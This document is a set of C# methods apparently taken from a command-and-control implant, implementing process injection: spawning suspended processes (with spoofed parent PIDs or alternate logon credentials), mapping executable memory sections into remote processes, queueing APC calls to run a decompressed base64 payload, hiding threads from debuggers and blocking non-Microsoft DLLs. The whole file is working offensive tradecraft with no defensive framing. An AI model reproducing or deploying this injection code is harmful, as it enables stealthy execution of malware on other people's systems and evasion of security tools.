public static IntPtr SetInformationThread(Natives.PROCESS_INFORMATION procInfo) { IntPtr th = procInfo.hThread; IntPtr infoth = Natives.ZwSetInformationThread(th, 1, IntPtr.Zero, 0); return(infoth); }
public static int ResumeThread(Natives.PROCESS_INFORMATION procInfo) { IntPtr th = procInfo.hThread; ulong outsupn = 0; int rest = Natives.ZwAlertResumeThread(th, out outsupn); return(rest); }
public static bool SetInformationThread(Natives.PROCESS_INFORMATION procInfo) { IntPtr th = procInfo.hThread; if (Natives.ZwSetInformationThread(th, (uint)Natives.SYSTEM_INFORMATION_CLASS.SystemProcessorInformation, IntPtr.Zero, 0) != 0) { return(false); } return(true); }
public static bool QueueApcThread(IntPtr baseAddr, Natives.PROCESS_INFORMATION procInfo) { IntPtr th = procInfo.hThread; if (Natives.ZwQueueApcThread(th, baseAddr, IntPtr.Zero) != 0) { return(false); } return(true); }
public static bool CreateProcess(string processname, bool inheritHandler, ref Natives.PROCESS_INFORMATION procInfo) { Natives.STARTUPINFO startInfo = new Natives.STARTUPINFO(); if (!Natives.CreateProcess(IntPtr.Zero, processname, IntPtr.Zero, IntPtr.Zero, inheritHandler, Natives.CreateSuspended, IntPtr.Zero, IntPtr.Zero, ref startInfo, out procInfo)) { return(false); } return(true); }
static void Execute(string [] args) { var startInfo = new Natives.STARTUPINFO(); Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION(); Natives.LARGE_INTEGER largeinteger = new Natives.LARGE_INTEGER(); Natives.SYSTEM_INFO info = new Natives.SYSTEM_INFO(); startInfo.cb = (uint)Marshal.SizeOf(startInfo); Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES(); Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES(); pSec.nLength = Marshal.SizeOf(pSec); tSec.nLength = Marshal.SizeOf(tSec); IntPtr section = IntPtr.Zero; uint size = 0; IntPtr baseAddr = IntPtr.Zero; IntPtr viewSize = (IntPtr)size; IntPtr soffset = IntPtr.Zero; IntPtr baseAddrEx = IntPtr.Zero; IntPtr viewSizeEx = (IntPtr)size; IntPtr hToken = IntPtr.Zero; IntPtr hProcTest = IntPtr.Zero; IntPtr hTokenTest = IntPtr.Zero; uint flags = Natives.CreateSuspended | Natives.CreateNoWindow; try { if (Natives.CreateProcessWithLogonW("#USERNAME#", "#DOMAIN#", "#PASSWORD#", Natives.LogonFlags.NetCredentialsOnly, @"C:\Windows\System32\#SPAWN#", "", flags, (UInt32)0, "C:\\Windows\\System32", ref startInfo, out procInfo)) { byte[] payload = DecompressDLL(Convert.FromBase64String(nutclr)); //Round payload size to page size Natives.GetSystemInfo(ref info); size = info.dwPageSize - (uint)payload.Length % info.dwPageSize + (uint)payload.Length; largeinteger.LowPart = size; //Crteate section in current process var status = Natives.ZwCreateSection(ref section, Natives.GenericAll, IntPtr.Zero, ref largeinteger, Natives.PAGE_EXECUTE_READWRITE, Natives.SecCommit, IntPtr.Zero); //Map section to current process status = Natives.ZwMapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, IntPtr.Zero, IntPtr.Zero, soffset, ref viewSize, 1, 0, Natives.PAGE_EXECUTE_READWRITE); if (baseAddr != IntPtr.Zero) { //Copy payload to current process section Marshal.Copy(payload, 0, baseAddr, payload.Length); //Map remote section status = Natives.ZwMapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref viewSizeEx, 1, 0, Natives.PAGE_EXECUTE_READWRITE); if (baseAddrEx != IntPtr.Zero && viewSizeEx != IntPtr.Zero) { //Unmap current process section Natives.ZwUnmapViewOfSection(Natives.GetCurrentProcess(), baseAddr); // Assign address of shellcode to the target thread apc queue IntPtr th = procInfo.hThread; IntPtr ptrq = Natives.ZwQueueApcThread(th, baseAddrEx, IntPtr.Zero); Natives.ZwSetInformationThread(th, 1, IntPtr.Zero, 0); //Before resuming the thread we write the stager on wnf //so it can be read from the spawned process from other session WriteWnF(task); int rest = Natives.ZwResumeThread(th, out ulong outsupn); } else { Console.WriteLine("[x] Error mapping remote section"); File.WriteAllText(@"c:\temp\log.txt", "[x] Error mapping remote section"); } } else { Console.WriteLine("[x] Error mapping section to current process"); File.WriteAllText(@"c:\temp\log.txt", "[x] Error mapping section to current process"); } Natives.CloseHandle(procInfo.hThread); Natives.CloseHandle(procInfo.hProcess); Natives.CloseHandle(hProcTest); Natives.CloseHandle(hTokenTest); } else { Console.WriteLine("[x] Error creating process"); File.WriteAllText(@"c:\temp\log.txt", "[x] Error creating process " + Natives.GetLastError()); } Natives.CloseHandle(hProcTest); Natives.CloseHandle(hTokenTest); } catch (Exception e) { Console.WriteLine("[x] Generic error"); File.WriteAllText(@"c:\temp\log.txt", "[x] Generic error " + e.Message + " " + e.StackTrace); } }
public static bool OpenAndInject(int pid, byte[] payload) { IntPtr hproc = OpenProcess(pid); //Round payload size to page size uint size = InjectionHelper.GetSectionSize(payload.Length); //Crteate section in current process IntPtr section = IntPtr.Zero; section = InjectionHelper.CreateSection(size, Natives.PAGE_EXECUTE_READWRITE); if (section == IntPtr.Zero) { return(false); } //Map section to current process IntPtr baseAddr = IntPtr.Zero; IntPtr viewSize = (IntPtr)size; InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Natives.PAGE_EXECUTE_READWRITE); if (baseAddr == IntPtr.Zero) { return(false); } //Copy payload to current process section Marshal.Copy(payload, 0, baseAddr, payload.Length); //Map remote section IntPtr baseAddrEx = IntPtr.Zero; IntPtr viewSizeEx = (IntPtr)size; InjectionHelper.MapViewOfSection(section, hproc, ref baseAddrEx, ref viewSizeEx, Natives.PAGE_EXECUTE_READWRITE); if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero) { return(false); } if (!InjectionHelper.UnMapViewOfSection(baseAddr)) { return(false); } IntPtr hNtdll = Natives.LoadLibrary("ntdll.dll"); IntPtr pExitUserThread = Natives.GetProcAddress(hNtdll, "RtlExitUserThread"); long offset = pExitUserThread.ToInt64() - hNtdll.ToInt64(); IntPtr pRemoteNtdll = GetRemoteModuleBaseAddress(pid, "ntdll.dll"); IntPtr pRemoteAddress = IntPtr.Add(pRemoteNtdll, (int)offset); IntPtr hThread = IntPtr.Zero; Natives.NtCreateThreadEx(out hThread, 0x1FFFFF, IntPtr.Zero, hproc, pRemoteAddress, IntPtr.Zero, true, 0, 0xffff, 0xffff, IntPtr.Zero); if (hThread == IntPtr.Zero) { return(false); } Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION(); procInfo.hThread = hThread; procInfo.hProcess = hproc; // Assign address of shellcode to the target thread apc queue if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo)) { return(false); } InjectionHelper.ResumeThread(procInfo); return(true); }
public static bool SapwnAndInjectPPID(string binary, byte[] payload, int ppid) { Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION(); Natives.CreationFlags flags = Natives.CreationFlags.CREATE_SUSPENDED | Natives.CreationFlags.DETACHED_PROCESS | Natives.CreationFlags.CREATE_NO_WINDOW | Natives.CreationFlags.EXTENDED_STARTUPINFO_PRESENT; if (!Spawner.CreateProcess(binary, ppid, flags, ref procInfo)) { return(false); } //Round payload size to page size uint size = InjectionHelper.GetSectionSize(payload.Length); //Crteate section in current process IntPtr section = IntPtr.Zero; section = InjectionHelper.CreateSection(size, Natives.PAGE_EXECUTE_READWRITE); if (section == IntPtr.Zero) { return(false); } //Map section to current process IntPtr baseAddr = IntPtr.Zero; IntPtr viewSize = (IntPtr)size; InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Natives.PAGE_READWRITE); if (baseAddr == IntPtr.Zero) { return(false); } //Copy payload to current process section Marshal.Copy(payload, 0, baseAddr, payload.Length); //Map remote section IntPtr baseAddrEx = IntPtr.Zero; IntPtr viewSizeEx = (IntPtr)size; InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx, Natives.PAGE_EXECUTE); if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero) { return(false); } if (!InjectionHelper.UnMapViewOfSection(baseAddr)) { return(false); } // Assign address of shellcode to the target apc queue if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo)) { return(false); } InjectionHelper.ResumeThread(procInfo); Natives.CloseHandle(procInfo.hThread); Natives.CloseHandle(procInfo.hProcess); return(true); }
public static bool CreateProcessPCMPBNMBSAO(IntPtr hReadPipe, IntPtr hWritePipe, string processname, bool inheritHandler, ref Natives.PROCESS_INFORMATION procInfo) { Natives.SetHandleInformation(hReadPipe, Natives.HANDLE_FLAGS.INHERIT, 0); Natives.STARTUPINFOEX sInfoEx = new Natives.STARTUPINFOEX(); sInfoEx.StartupInfo.hStdOutput = hWritePipe; sInfoEx.StartupInfo.hStdErr = hWritePipe; sInfoEx.StartupInfo.dwFlags = Natives.STARTF_USESTDHANDLES; IntPtr lpValue = IntPtr.Zero; Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES(); Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES(); pSec.nLength = Marshal.SizeOf(pSec); tSec.nLength = Marshal.SizeOf(tSec); IntPtr pntpSec = Marshal.AllocHGlobal(Marshal.SizeOf(pSec)); Marshal.StructureToPtr(pSec, pntpSec, false); IntPtr pnttSec = Marshal.AllocHGlobal(Marshal.SizeOf(tSec)); Marshal.StructureToPtr(tSec, pnttSec, false); IntPtr lpSize = IntPtr.Zero; Natives.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); sInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); Natives.InitializeProcThreadAttributeList(sInfoEx.lpAttributeList, 1, 0, ref lpSize); Natives.DWORD64 policy = new Natives.DWORD64(); policy.dwPart1 = 0; policy.dwPart2 = 0x1000; lpValue = Marshal.AllocHGlobal(Marshal.SizeOf(policy)); Marshal.StructureToPtr(policy, lpValue, false); Natives.UpdateProcThreadAttribute(sInfoEx.lpAttributeList, 0, (IntPtr)Natives.PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, lpValue, (IntPtr)Marshal.SizeOf(policy), IntPtr.Zero, IntPtr.Zero); sInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(sInfoEx); if (!Natives.CreateProcess(IntPtr.Zero, processname, IntPtr.Zero, IntPtr.Zero, inheritHandler, Natives.CreateSuspended | (uint)Natives.CreationFlags.EXTENDED_STARTUPINFO_PRESENT, IntPtr.Zero, IntPtr.Zero, ref sInfoEx, out procInfo)) { return(false); } return(true); }
public static bool CreateProcess(IntPtr hReadPipe, IntPtr hWritePipe, string processname, bool inheritHandler, ref Natives.PROCESS_INFORMATION procInfo) { Natives.SetHandleInformation(hReadPipe, Natives.HANDLE_FLAGS.INHERIT, 0); var startInfo = new Natives.STARTUPINFO { hStdOutput = hWritePipe, hStdErr = hWritePipe, dwFlags = Natives.STARTF_USESTDHANDLES }; if (!Natives.CreateProcess(IntPtr.Zero, processname, IntPtr.Zero, IntPtr.Zero, inheritHandler, Natives.CreateSuspended, IntPtr.Zero, IntPtr.Zero, ref startInfo, out procInfo)) { return(false); } return(true); }
public static bool CreateProcessWithLogonW(string username, string password, string domain, string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation) { Natives.STARTUPINFO startupInfo = new Natives.STARTUPINFO(); startupInfo.cb = (uint)Marshal.SizeOf(typeof(Natives.STARTUPINFO)); if (!Natives.CreateProcessWithLogonW(username, domain, password, Natives.LogonFlags.NetCredentialsOnly, path + binary, path + binary + " " + arguments, cf, 0, path, ref startupInfo, out processInformation)) { return(false); } Console.WriteLine("Process created"); return(true); }
public static bool CreateProcess(string processname, int ppid, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION procInfo) { Natives.STARTUPINFOEX sInfoEx = new Natives.STARTUPINFOEX(); sInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(sInfoEx); IntPtr lpValue = IntPtr.Zero; Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES(); Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES(); pSec.nLength = Marshal.SizeOf(pSec); tSec.nLength = Marshal.SizeOf(tSec); IntPtr pntpSec = Marshal.AllocHGlobal(Marshal.SizeOf(pSec)); Marshal.StructureToPtr(pSec, pntpSec, false); IntPtr pnttSec = Marshal.AllocHGlobal(Marshal.SizeOf(tSec)); Marshal.StructureToPtr(tSec, pnttSec, false); IntPtr lpSize = IntPtr.Zero; Natives.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); sInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); Natives.InitializeProcThreadAttributeList(sInfoEx.lpAttributeList, 1, 0, ref lpSize); IntPtr parentHandle = Process.GetProcessById(ppid).Handle; lpValue = Marshal.AllocHGlobal(IntPtr.Size); Marshal.WriteIntPtr(lpValue, parentHandle); Natives.UpdateProcThreadAttribute(sInfoEx.lpAttributeList, 0, (IntPtr)Natives.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); if (!Natives.CreateProcess(IntPtr.Zero, processname, pntpSec, pnttSec, false, (uint)cf, IntPtr.Zero, IntPtr.Zero, ref sInfoEx, out procInfo)) { return(false); } return(true); }
public static bool CreateProcessWithLogonW(string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation) { string domain; try { domain = Environment.UserDomainName; } catch (Exception) { domain = System.Environment.MachineName; } string username = Environment.UserName; return(CreateProcessWithLogonW(username, "password", domain, path, binary, arguments, cf, ref processInformation)); }
public void ExecuteModule() { string output = ""; IntPtr hReadPipe = IntPtr.Zero; IntPtr hWritePipe = IntPtr.Zero; if (!Spawner.CreatePipe(ref hReadPipe, ref hWritePipe)) { return; } Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION(); if (!Spawner.CreateProcess(hReadPipe, hWritePipe, this.processname, true, ref procInfo)) { return; } string pipename = GetPipeName(procInfo.dwProcessId); InjectionLoaderListener injectionLoaderListener = new InjectionLoaderListener(pipename, task); byte[] payload = Utility.DecompressDLL(Convert.FromBase64String(Program.nutclr)); //Round payload size to page size uint size = InjectionHelper.GetSectionSize(payload.Length); //Crteate section in current process IntPtr section = IntPtr.Zero; section = InjectionHelper.CreateSection(size); if (section == IntPtr.Zero) { return; } //Map section to current process IntPtr baseAddr = IntPtr.Zero; IntPtr viewSize = (IntPtr)size; InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize); if (baseAddr == IntPtr.Zero) { return; } //Copy payload to current process section Marshal.Copy(payload, 0, baseAddr, payload.Length); //Map remote section IntPtr baseAddrEx = IntPtr.Zero; IntPtr viewSizeEx = (IntPtr)size; InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx); if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero) { return; } if (!InjectionHelper.UnMapViewOfSection(baseAddr)) { return; } // Assign address of shellcode to the target thread apc queue if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo)) { return; } IntPtr infoth = InjectionHelper.SetInformationThread(procInfo); if (infoth == IntPtr.Zero) { return; } InjectionHelper.ResumeThread(procInfo); output = injectionLoaderListener.Execute(procInfo.hProcess, hReadPipe); Natives.CloseHandle(procInfo.hThread); Natives.CloseHandle(procInfo.hProcess); SendResponse(output); }
public static bool SapwnAndInject(string binary, byte[] payload) { Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION(); if (!Spawner.CreateProcess(binary, true, ref procInfo)) { return(false); } //Round payload size to page size uint size = InjectionHelper.GetSectionSize(payload.Length); //Crteate section in current process IntPtr section = IntPtr.Zero; section = InjectionHelper.CreateSection(size); if (section == IntPtr.Zero) { return(false); } //Map section to current process IntPtr baseAddr = IntPtr.Zero; IntPtr viewSize = (IntPtr)size; InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize); if (baseAddr == IntPtr.Zero) { return(false); } //Copy payload to current process section Marshal.Copy(payload, 0, baseAddr, payload.Length); //Map remote section IntPtr baseAddrEx = IntPtr.Zero; IntPtr viewSizeEx = (IntPtr)size; InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx); if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero) { return(false); } if (!InjectionHelper.UnMapViewOfSection(baseAddr)) { return(false); } // Assign address of shellcode to the target thread apc queue if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo)) { return(false); } IntPtr infoth = InjectionHelper.SetInformationThread(procInfo); if (infoth == IntPtr.Zero) { return(false); } InjectionHelper.ResumeThread(procInfo); Natives.CloseHandle(procInfo.hThread); Natives.CloseHandle(procInfo.hProcess); return(true); }